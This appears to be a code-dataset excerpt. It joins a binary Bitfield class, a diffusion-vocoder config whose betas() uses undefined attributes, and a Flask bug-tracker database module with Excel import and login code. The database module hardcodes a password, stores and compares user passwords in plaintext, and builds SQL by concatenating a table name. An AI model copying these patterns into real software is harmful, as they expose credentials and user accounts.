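# counts from the most significant bit of the byte, so bit_index=0 maps to
# bitmask = 1 << 7 = 0b10000000 and bit_index=7 maps to 0b00000001. Reading bit 0
# of the stored byte 0b10110000 therefore yields True, and clearing it leaves
# the remaining bits untouched.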
class Bitfield(property, ProxyTarget, BinaryProperty, Parseable,
Serializable,
Storable, Nameable):
size = 1
min_size = 1
field_count = 8
def __init__(self, index, *members):
super(Bitfield, self).__init__(
fget=self.get,
fset=self.set)
if sum([m.size for m in members]) != self.field_count:
raise ValueError(
"Members passed to Bitfield must sum to %d "
"bits (got: %s)." % (
self.field_count,
[m.size for m in members]))
self.members = members
self.index = index
@property
def sort_order(self):
return self.index
def parse_and_get_size(self, stream):
return (unpack_from('B', stream, 0)[0], self.size)
def serialize(self, instance):
return pack('B', self.get(instance))
def initialize_with_default(self, instance):
default = 0
defaults = [member.default for member in self.members]
for i, bit_default in enumerate(defaults):
default <<= 1
default |= 1 if bit_default else 0
self.set(instance, default)
def __repr__(self):
return "<%s index=%d members=%s>" % (
self.__class__.__name__,
self.index,
" ".join([str(member) for member in self.members])
)
def expand(self):
results = []
index = 0
for m in self.members:
if isinstance(m, Bit):
results.append(BitProxy(self, index, m.default, m.validator))
index += 1
elif isinstance(m, Empty):
index += m.size
return results
| 26.978441 | 79 | 0.564482 |
e2f53f8a279f27b22532899f4c07a671e59846b9 | 1,237 | py | Python | dwg/config.py | revsic/torch-diffusion-wavegan | e72765abe238c6d3e29d82e8e17a8f33f06ab6b6 | [
"MIT"
] | 12 | 2022-02-28T06:46:11.000Z | 2022-03-20T05:42:20.000Z | dwg/config.py | revsic/torch-diffusion-wavegan | e72765abe238c6d3e29d82e8e17a8f33f06ab6b6 | [
"MIT"
] | null | null | null | dwg/config.py | revsic/torch-diffusion-wavegan | e72765abe238c6d3e29d82e8e17a8f33f06ab6b6 | [
"MIT"
] | 3 | 2022-03-01T01:24:53.000Z | 2022-03-20T03:38:07.000Z | import numpy as np
class Config:
"""DiffusionWaveGAN configurations.
"""
def __init__(self, mel: int):
"""Initializer.
Args:
mel: spectrogram channels.
"""
self.mel = mel
# diffusion steps
self.steps = 4
# schedules
self.internals = 1024
self.logit_max = 10
self.logit_min = -10
# block
self.channels = 64
self.kernels = 3
self.dilations = 2
# embedder
self.pe = 128
self.embeddings = 512
self.mappings = 2
# latent mapper
self.mapchannels = 8
self.mapkernels = 5
self.maplayers = 2
# upsampler
self.upkernels = 5
self.upscales = [4, 4, 4, 4]
self.leak = 0.2
# wavenet
self.cycles = 3
self.layers = 10
def betas(self) -> np.ndarray:
"""Beta values.
"""
steps = np.arange(1, self.steps + 1)
# [S]
betas = 1 - np.exp(
-self.beta_min / self.steps - 0.5 * (
self.beta_max - self.beta_min
) * (2 * steps - 1) * self.steps ** -2)
# [S + 1]
return np.concatenate([[0.], betas])
| 21.701754 | 51 | 0.47696 |
3df7532f0c55396a3779628248426f7fbd8b62aa | 373 | py | Python | preprocessor/cleaner.py | mmcenta/missing-link | d4edea5c2a18ac90004d33757d93769af8bc3251 | [
"MIT"
] | null | null | null | preprocessor/cleaner.py | mmcenta/missing-link | d4edea5c2a18ac90004d33757d93769af8bc3251 | [
"MIT"
] | null | null | null | preprocessor/cleaner.py | mmcenta/missing-link | d4edea5c2a18ac90004d33757d93769af8bc3251 | [
"MIT"
] | null | null | null | from string import punctuation, digits
class Cleaner:
def __init__(self, filter=(punctuation + digits)):
self.filter = filter
def clean(self, text):
text = text.replace("\n", " ").replace("\r", " ")
text = text.translate(str.maketrans(dict.fromkeys(self.filter, " ")))
return text.translate(str.maketrans(dict.fromkeys("'`", "")))
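# Illustrative usage (a sketch): punctuation and digits are turned into spaces,
# so Cleaner().clean("Hello, world 42!") comes back as "Hello  world" padded
# with spaces where the comma, the digits and the "!" used to be.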
| 33.909091 | 77 | 0.624665 |
5ba9d9a483b28812419b5701357c84bf86a46307 | 49,794 | py | Python | py/dbutils.py | tiaodan/bugcount_flask | 7cb8aaf486e7d845acb3d5f42e73919ee939d979 | [
"MulanPSL-1.0"
] | null | null | null | py/dbutils.py | tiaodan/bugcount_flask | 7cb8aaf486e7d845acb3d5f42e73919ee939d979 | [
"MulanPSL-1.0"
] | null | null | null | py/dbutils.py | tiaodan/bugcount_flask | 7cb8aaf486e7d845acb3d5f42e73919ee939d979 | [
"MulanPSL-1.0"
] | null | null | null | import xlrd
import xlwt
import pymysql
import json
# Import Python's traceback module to trace errors
import traceback
import os
import xlsxwriter
from py import utils
from collections import Counter
from datetime import datetime
# Database configuration
"""
db_host = 'localhost'
db_user = 'root'
db_passwd = 'sunkaisens'
db_dbname = 'bugcount'
"""
print('<dbutil.py>获取。。。。。。。。。。。。。。。。config文件 start')
db_config_dict = utils.get_dbargs_from_config_byabspath()
db_host = db_config_dict['db_host']
db_user = db_config_dict['db_user']
db_passwd = db_config_dict['db_passwd']
db_dbname = db_config_dict['db_dbname']
print('<dbutil.py>获取。。。。。。。。。。。。。。。。config文件 end ')
# Initialize variables
currentpath = os.path.abspath(__file__)
print('当前路径', currentpath)
rootdir = os.path.abspath(os.path.dirname(currentpath) + os.path.sep + '..')  # one level above the current path
print('根目录==', rootdir)
# Define a dict mapping English table headers to Chinese table headers
tableheaddict = {
"bug_submit_date": "提交日期",
"project": "项目",
"software": "软件类",
"test_version": "测试版本",
"bug_description": "描述",
"severity_level": "严重等级",
"priority": "优先级",
"bug_difficulty": "难度",
"bug_status": "关闭情况",
"bug_close_date": "关闭日期",
"close_version": "关闭版本",
"cause_analysis": "原因分析",
"bug_img": "问题图片",
"intermediate_situation": "中间情况",
"developer": "开发者",
"remark": "备注",
"regression_times": "回归次数",
"reopen_times": "重开次数",
"submitterindex": "提交者索引",
None: "" # 导出的表格不能出现None,因为再次导入,日期格式如果是None会报错.可以直接使用aa[None] 调用
}
# Database operations
class DB():
def __init__(self, host='localhost', port=3306, db='', user='root', passwd='sunkaisens', charset='utf8'):
        # Establish the connection
self.conn = pymysql.connect(host=host, port=port, db=db, user=user, passwd=passwd, charset=charset)
        # Create a cursor that returns rows as dicts
self.cur = self.conn.cursor(cursor=pymysql.cursors.DictCursor)
def __enter__(self):
# 返回游标
return self.cur
def __exit__(self, exc_type, exc_val, exc_tb):
# 提交数据库并执行
self.conn.commit()
# 关闭游标
self.cur.close()
# 关闭数据库连接
self.conn.close()
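# DB 上下文管理器用法示例(仅作说明,非原有代码;查询的表为本文件中已有的 bugcount.user):
# with DB(host=db_host, user=db_user, passwd=db_passwd, db=db_dbname) as cur:
#     cur.execute('select * from bugcount.user limit 1')
#     for row in cur:
#         print(row)  # 游标是 DictCursor,每行是一个字典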
# 定义数据库操作
# 参数 ip 用户名 密码 数据库名,必须要传1个参数
def withDB(sql1, *sqlN):
# with DB(host='localhost', user='root', passwd='123456', db='bugcount') as db:
with DB(host=db_host, user=db_user, passwd=db_passwd, db=db_dbname) as db:
# db.execute('show databases')
# 默认执行第一条语句
db.execute(sql1)
# 执行结果
print(db)
for i in db:
print(i)
# 查询方法参数个数,根据参数个数执行语句
print("sql1==", sql1)
print("sqlN==", sqlN)
fun_args_nums = len(sqlN)
print("方法参数个数有: %s " % len(sqlN))
print("不确定参数,第一个数为====", sqlN[0])
if fun_args_nums == 1:
# 执行第二条语句
db.execute(sqlN[0])
# 执行结果
print(db)
for i in db:
print(i)
db.close()
# 测试链接,打印版本
def db_test():
# 打开数据库连接
db = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = db.cursor()
# 使用 execute() 方法执行 SQL 查询
cursor.execute("SELECT VERSION()")
# 使用 fetchone() 方法获取单条数据.
data = cursor.fetchone()
print("Database version : %s " % data)
# 关闭数据库连接
cursor.close()
db.close()
# 打开数据库
# 1. sql 2. 参数后面的匹配变量
def execute_db_onesql_nouse(sql, *args):
# 初始化返回的数据 [arg1, arg2, arg3, arg4] arg1=状态码(num)arg2=msg(str) arg3= count(num) arg4=tuple
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
sql_return_result_tuple = () # 执行sql会返回tuple
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print(f'sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
print("执行语句返回结果(类型)==", type(sql_return_result_tuple))
print("sql语句执行成功")
# 转化下查询结果为{},{},{}这种格式
count = len(sql_return_result_tuple) # sql语句结果个数
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
return_list = [code, msg, count, sql_return_result_tuple]
print(f'《返回结果》 return_list===={return_list}')
print('拼接返回给 《调用者》 的 数据类型====', type(return_list))
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
# 拼接返回数据,返回列表
return_list = [code, msg, count, sql_return_result_tuple]
print('sql异常 执行sql 返回的数据====', return_list)
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
return return_list
# 通过excel导入mysql
def import_mysql_by_excel():
# json数据
data = {}
buglist = []
# 默认定义数据
code = 500 # 默认失败
msg = '导入失败'
count = 0 # sql语句执行结果个数
isrepeat = 0 # 1有,0没有
repeatlist = [] # 提交者索引 重复内容
# 打开数据所在的工作簿,以及选择存有数据的工作表
# book = xlrd.open_workbook("../excel_upload/buglist.xls")
tablehead = ['提交日期', '项目', '软件类', '测试版本', '描述',
'严重等级', '优先级', '难度', '关闭情况', '关闭日期',
'关闭版本', '原因分析', '问题图片', '中间情况', '开发者',
'备注', '回归次数', '重开次数', '提交者索引']
book = xlrd.open_workbook("./excel_upload/template.xlsx")
# 1. 检测xecel表格内容是否符合标准
is_exceldata_ok_jsonstr = utils.checkexcel_data("./excel_upload/template.xlsx", tablehead)
is_exceldata_ok_jsonobj = json.loads(is_exceldata_ok_jsonstr)
check_excel_code = is_exceldata_ok_jsonobj['code']
if check_excel_code == 200:
# 建立一个MySQL连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 获得游标
cur = conn.cursor()
# 1. 读取每一个sheet名称,并将可见的sheet组成一个list
sheetnames = book.sheet_names()
showsheet_names = list()
hidesheet_names = list()
for sheetname in sheetnames:
sheet = book.sheet_by_name(sheetname)
if sheet.visibility == 0: # 可见
showsheet_names.append(sheet.name)
else: # ==1 不可见
hidesheet_names.append(sheet.name)
print("??????????????显示sheet==", showsheet_names)
print("??????????????隐藏sheet==", hidesheet_names)
print("??????sheets===", sheetnames)
# 2. 循环写入数据
for showsheet_name in showsheet_names:
print('????当前sheet==', showsheet_name)
sheet = book.sheet_by_name(showsheet_name)
# sheet = book.sheet_by_name("Sheet1")
# 创建插入SQL语句 带第一次回归、第二次回归、第三次回归相关列表的sql
# query = 'insert into bugcount.buglist (name,sex,minzu,danwei_zhiwu,phone_number,home_number) values (%s, %s, %s, %s, %s, %s)'
# query = 'INSERT INTO `buglist` VALUES ('2', '2020-01-10', '1808', 'icss', 'icss_disp_20200108', '调度台无法强插', '3', '2', '2', '1', '0', null, null, null, null, '李东东', null, null, null, null, null, null, null, null, null, null);'
# sql = 'insert into bugcount.buglist (bugid, bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, first_bug_regression_date, first_bug_regression_status, first_bug_regression_remark, second_bug_regression_date, second_bug_regression_status, second_bug_regression_remark, third_bug_regression_date, third_bug_regression_status, third_bug_regression_remark) ' \
# 'values (null, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s) ' \
# 'on duplicate key update bug_submit_date=%s,project=%s,software=%s,test_version=%s,severity_level=%s,priority=%s,bug_difficulty=%s,bug_status=%s,bug_close_date=%s,close_version=%s,cause_analysis=%s,bug_img=%s,intermediate_situation=%s,developer=%s,remark=%s' \
# ',first_bug_regression_date=%s,first_bug_regression_status=%s,first_bug_regression_remark=%s,second_bug_regression_date=%s,second_bug_regression_status=%s,second_bug_regression_remark=%s,third_bug_regression_date=%s,third_bug_regression_status=%s,third_bug_regression_remark=%s'
sql = 'insert into bugcount.buglist (bugid, bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex) ' \
'values (null, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s, %s, %s, %s) ' \
'on duplicate key update bug_submit_date=%s,project=%s,software=%s,test_version=%s,bug_description=%s,severity_level=%s,priority=%s,bug_difficulty=%s,bug_status=%s,bug_close_date=%s,close_version=%s,cause_analysis=%s,bug_img=%s,intermediate_situation=%s,developer=%s,remark=%s,regression_times=%s,reopen_times=%s'
print('sql==', sql)
# 执行前先判断索引列(submitterindex)是否有重复的,提示用户,重复的行是submitterindex_col_list[n] +1
submitterindex_col_list = []
for r in range(1, sheet.nrows):
submitterindex = sheet.cell(r, 18).value
submitterindex_col_list.append(submitterindex)
for k, v in Counter(submitterindex_col_list).items():
if v > 1:
isrepeat = 1 # 有重复选项
msg = '上传的execel表索引有重复,请检查submitterindex列'
print('重复的元素', k)
repeatlist.append(k)
if isrepeat != 1: # 没有重复项
# 创建一个for循环迭代读取xls文件每行数据的, 从第二行开始是要跳过标题行
for r in range(1, sheet.nrows):
# print('Nlie nrows==', sheet.nrows)
# print('curent r ==', r)
n = 1
# print('shel.cell', sheet.cell(r, n))
# bug_submit_date_noformat = datetime.strptime(str(sheet.cell(r, 0).value), '%Y-%m-%d').time()
# time.strftime("%Y-%m-%d %H:%M:%S", sheet.cell(r, 0).value)
bug_submit_date = sheet.cell(r, 0).value
# print('!!!!!!!!!!!!!!!!!!!!bug_submit_date', sheet.cell(r, 0).value)
if bug_submit_date is None or bug_submit_date == '':
# bug_submit_date = "1888-01-01"
bug_submit_date = None
elif type(bug_submit_date) == float:
# 类型为时间戳
bug_submit_date = xlrd.xldate.xldate_as_datetime(sheet.cell(r, 0).value, 0).strftime("%Y-%#m-%#d") # 应该传一个时间数值
# print("转换时间戳完成后", bug_submit_date)
elif type(bug_submit_date) == str:
# 上传时为xxxx/xx/xx这种格式,转化成 xxxx-zz-zz
bug_submit_date = bug_submit_date.replace("/", "-")
# bug_submit_date = datetime.strftime(datetime.strptime(bug_submit_date, "%Y/%m/%d"), "%Y-%#m-%#d")
# print('!!!!!!!!!!!!!!!!!!!!bug_submit_date 转换后type', type(bug_submit_date))
# print('!!!!!!!!!!!!!!!!!!!!bug_submit_date 转换后', bug_submit_date)
# 因为excel里面是2020/01/10这种格式的,所以需要转化
project = sheet.cell(r, 1).value
software = sheet.cell(r, 2).value
test_version = sheet.cell(r, 3).value
bug_description = sheet.cell(r, 4).value
severity_level = sheet.cell(r, 5).value # 严重等级
if severity_level is None or severity_level == '':
severity_level = None
priority = sheet.cell(r, 6).value # 优先级
if priority is None or priority == '':
priority = None
bug_difficulty = sheet.cell(r, 7).value
if bug_difficulty is None or bug_difficulty == '':
bug_difficulty = None
bug_status = sheet.cell(r, 8).value # float
# 将用户导入的“关闭情况” --》转成数字
# 1 处理(handle),2 关闭(close),3 回归(regression),4 延迟(delay), 5 重开(reopen) 0 未知(可能用户上传时bug_status字段不对)//excel上传导入时,填写中文、英文均可
if bug_status == "处理" or bug_status == "handle":
bug_status = 1
elif bug_status == "关闭" or bug_status == "close":
bug_status = 2
elif bug_status == "回归" or bug_status == "regression":
bug_status = 3
elif bug_status == "延迟" or bug_status == "delay":
bug_status = 4
elif bug_status == "重开" or bug_status == "reopen":
bug_status = 5
else:
bug_status = 0 # 未知(可能用户上传时bug_status字段不对)
bug_close_date = sheet.cell(r, 9).value
# print('!!!!!!!!!!!!!!!!!!!!bug_close_dateexcel日期类型 前', bug_close_date)
if bug_close_date is None or bug_close_date == '':
bug_close_date = None
elif type(bug_close_date) == float:
bug_close_date = xlrd.xldate.xldate_as_datetime(sheet.cell(r, 9).value, 0).strftime("%Y-%#m-%#d")
# print("转换时间戳完成后bug_close_date", bug_submit_date)
elif type(bug_close_date) == str:
# 类型为xxxx/xx/xx这种格式,转化成 xxx x-zz-zz
bug_close_date = bug_close_date.replace("/", "-")
# bug_close_date = datetime.strftime(datetime.strptime(bug_close_date, "%Y/%m/%d"), "%Y-%#m-%#d")
# print('!!!!!!!!!!!!!!!!!!!!bug_close_dateexcel日期类型 后', type(bug_close_date))
# print('!!!!!!!!!!!!!!!!!!!!bug_close_dateexcel日期 后', bug_close_date)
close_version = sheet.cell(r, 10).value
cause_analysis = sheet.cell(r, 11).value
bug_img = sheet.cell(r, 12).value
                    intermediate_situation = sheet.cell(r, 13).value  # 中间情况在第14列(索引13),原先误用了第12列
developer = sheet.cell(r, 14).value
remark = sheet.cell(r, 15).value
regression_times = sheet.cell(r, 16).value
# print("regression_times==============================", regression_times)
if regression_times is None or regression_times == '':
regression_times = None
reopen_times = sheet.cell(r, 17).value
# print("reopen_times==============================", reopen_times)
if reopen_times is None or reopen_times == '':
reopen_times = None
submitterindex = sheet.cell(r, 18).value
# print('-------查到的索引==', submitterindex)
n += 1
                    # values 前半部分为插入所需的 19 个变量(除去 bugid);后半部分为主键冲突时更新的 18 个参数(除去 bugid 和 submitterindex)
values = (
bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty,
bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer,
remark, regression_times, reopen_times, submitterindex,
bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty,
bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer,
remark, regression_times, reopen_times)
# print("!!!!!!!!!!!!!!导入values", values)
# values = (bug_submit_date, project, software, test_version)
# print('import_mysql_by_excel()方法 valuse=', values)
# 执行sql语句
cur.execute(sql, values)
code = 200
msg = '导入数据成功'
conn.commit()
columns = str(sheet.ncols)
rows = str(sheet.nrows)
print("导入 " + columns + " 列 " + rows + " 行数据到MySQL数据库!")
cur.close()
conn.close()
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
data['isrepeat'] = isrepeat
data['repeatlist'] = repeatlist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# 加上是否重复
is_exceldata_ok_jsonobj['isrepeat'] = 0 # 1有,0没有
is_exceldata_ok_jsonobj['repeatlist'] = [] # 提交者索引 重复内容
is_exceldata_ok_jsonstr = json.dumps(is_exceldata_ok_jsonobj)
return is_exceldata_ok_jsonstr
# 获取用户数据
def getUserList():
# 打开数据库连接
print(f'数据库配置{db_host},{db_user}, {db_passwd}, {db_dbname}')
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname, )
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
sql = 'select * from bugcount.user'
cursor.execute(sql)
print('共有', cursor.rowcount, '条数据')
users = []
data = {}
results = cursor.fetchall()
for r in results:
print(r[0], end=' ')
print(r[1], end=' ')
print(r[2], end=' ')
print("---")
person = {}
person['id'] = r[0]
person['name'] = r[1]
person['pass'] = r[2]
users.append(person)
cursor.close()
conn.close()
data['code'] = 200
data['msg'] = '成功'
# data['msg'] = 'suesss'
data['users'] = users
json_str = json.dumps(data)
print(json_str)
return json_str
# 1. sql 2. 参数后面的匹配变量
def register(*args):
# 初始化返回的数据 [arg1, arg2, arg3, arg4] arg1=状态码(num)arg2=msg(str) arg3= count(num) arg4=tuple
# json数据
data = {}
users = []
# 默认定义数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句 角色默认是普通用户 -2
sql = 'insert into bugcount.user (userid, username, password, user_remark, user_email, user_level, create_time, session, roleId)values(null, %s, %s, null, null, null, null, null, 2)'
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# 转换查询结果为[{},{},{}]这种格式的
print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
print("执行语句返回结果(类型)==", type(sql_return_result_tuple))
print("sql语句执行成功")
# 转化下查询结果为{},{},{}这种格式======================
print('????????result=', sql_return_result_tuple)
print('????????????????????type = ', type(sql_return_result_tuple))
for r in sql_return_result_tuple:
print('=============进入循环')
print('=============进入循环r0', r[0])
print('=============进入循环r1', r[1])
print('=============进入循环r2', r[2])
print('=============进入循环r3', r[3])
print('=============进入循环r4', r[4])
print('=============进入循环r5', r[5])
print('=============进入循环r6', str(r[6]))
print('=============进入循环r7', r[7])
person = dict()
person['userid'] = r[0]
person['username'] = r[1]
person['password'] = r[2]
person['user_remark'] = r[3]
person['user_email'] = r[4]
person['user_level'] = r[5]
person['create_time'] = str(r[6])
person['session'] = r[7]
# print('==============循环person==', person)
users.append(person)
print('????dbutil 转换完的【{}】格式数据users==', users)
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
count = len(sql_return_result_tuple) # sql语句结果个数
# except Exception:
except:
# 如果发生错误则回滚
# 输出异常信息
traceback.print_exc()
print('出现异常,sql语句执行失败')
# print('出现异常,sql语句执行失败', Exception)
conn.rollback()
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = users
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# login 登录
def login(*args):
# 初始化返回的数据 [arg1, arg2, arg3, arg4] arg1=状态码(num)arg2=msg(str) arg3= count(num) arg4=tuple
# json数据
data = {}
users = []
# 默认定义数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
sql = 'select userid,username,password,user_remark,user_email,user_level,create_time,session from bugcount.user where username = %s and password = %s'
# print(f'sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# 转换查询结果为[{},{},{}]这种格式的
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple))
print("sql语句执行成功")
# 转化下查询结果为{},{},{}这种格式======================
# print('????????result=', sql_return_result_tuple)
# print('????????????????????type = ', type(sql_return_result_tuple))
for r in sql_return_result_tuple:
# print('=============进入循环')
# print('=============进入循环r0', r[0])
# print('=============进入循环r1', r[1])
# print('=============进入循环r2', r[2])
# print('=============进入循环r3', r[3])
# print('=============进入循环r4', r[4])
# print('=============进入循环r5', r[5])
# print('=============进入循环r6', str(r[6]))
# print('=============进入循环r7', r[7])
person = dict()
person['userid'] = r[0]
person['username'] = r[1]
person['password'] = r[2]
person['user_remark'] = r[3]
person['user_email'] = r[4]
person['user_level'] = r[5]
person['create_time'] = str(r[6])
person['session'] = r[7]
# print('==============循环person==', person)
users.append(person)
print('????dbutil 转换完的【{}】格式数据users==', users)
# 拼接返回数据,返回列表
count = len(sql_return_result_tuple) # sql语句结果个数
# 判断是否 能登录
if count > 0:
code = 200 # 成功
msg = '有此用户,可正常登录'
# except Exception:
except:
# 如果发生错误则回滚
# 输出异常信息
traceback.print_exc()
print('出现异常,sql语句执行失败')
# print('出现异常,sql语句执行失败', Exception)
conn.rollback()
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = users
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# 检查用户名是否 数据库是否被占用 True:code=200 False: code=500
def check_username_is_registered(username):
# 初始化返回的数据 [arg1, arg2, arg3, arg4] arg1=状态码(num)arg2=msg(str) arg3= count(num) arg4=tuple
# json数据
data = {}
users = []
# 默认定义数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
sql = 'select userid,username,password,user_remark,user_email,user_level,create_time,session from bugcount.user where username=%s'
# print(f'sql语句为==', sql)
# print("*args====", username)
# print('参数args类型=={args}', type(username))
cursor.execute(sql, username)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# 转换查询结果为[{},{},{}]这种格式的
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple))
print("sql语句执行成功")
# 转化下查询结果为{},{},{}这种格式======================
print('????????result=', sql_return_result_tuple)
print('????????????????????type = ', type(sql_return_result_tuple))
for r in sql_return_result_tuple:
# print('=============进入循环')
person = {}
person['userid'] = r[0]
person['username'] = r[1]
person['password'] = r[2]
person['user_remark'] = r[3]
person['user_email'] = r[4]
person['user_level'] = r[5]
person['create_time'] = str(r[6])
person['session'] = r[7]
users.append(person)
print('????dbutil 转换完的【{}】格式数据users==', users)
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
# print('?????????????????????josn sql_return_result_tuple type = ', type(len(sql_return_result_tuple)))
count = len(sql_return_result_tuple) # sql语句结果个数
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# 返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['json_data'] = users
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
"""
功能:导出数据库表中所有数据到 excel数据
"""
def export(tablename, outputpath):
# json数据
data = {}
buglist = []
code = 500 # 默认失败
msg = '导出失败'
count = 0 # sql语句执行结果个数
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname, charset='utf8')
cursor = conn.cursor()
sql = 'select bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex from ' + tablename
print('<dbutils> 导出数据 sql ==', sql)
count = cursor.execute(sql)
print(count)
# 重置游标的位置
cursor.scroll(0, mode='absolute')
# 搜取所有结果
results = cursor.fetchall()
# 获取MYSQL里面的数据字段名称
fields = cursor.description
workbook = xlwt.Workbook(encoding='utf-8') # 创建Workbook,相当于创建Excel
# sheet = workbook.add_sheet('table_'+table_name, cell_overwrite_ok=True)
sheet = workbook.add_sheet('Sheet1', cell_overwrite_ok=True) # 写入sheet1
# 写上字段信息
for field in range(0, len(fields)):
sheet.write(0, field, fields[field][0])
# 获取并写入数据段信息
row = 1
col = 0
for row in range(1, len(results) + 1):
for col in range(0, len(fields)):
sheet.write(row, col, u'%s' % results[row - 1][col])
# 写文件,如果目录文件不存在,则创建
    workbook.save(outputpath)
    cursor.close()
    conn.close()
    # 顺序执行到这里即视为导出成功
    code = 200
    msg = '导出成功'
    # 返回json格式的数据
    data['code'] = code
    data['msg'] = msg
    data['count'] = count
    data['data'] = buglist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# 功能:执行一条sql语句
# 1. sql 2. 参数后面的匹配变量
def execute_onesql(sql, *args):
# 初始化数据
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
sql_return_result_tuple = () # 执行sql会返回tuple
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print('sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
# print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
# print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
# print("执行语句返回结果(类型)==", type(sql_return_result_tuple)) # tuple
print("sql语句执行成功")
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
return 0 # 异常返回数字0
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
# print('返回数据如下:')
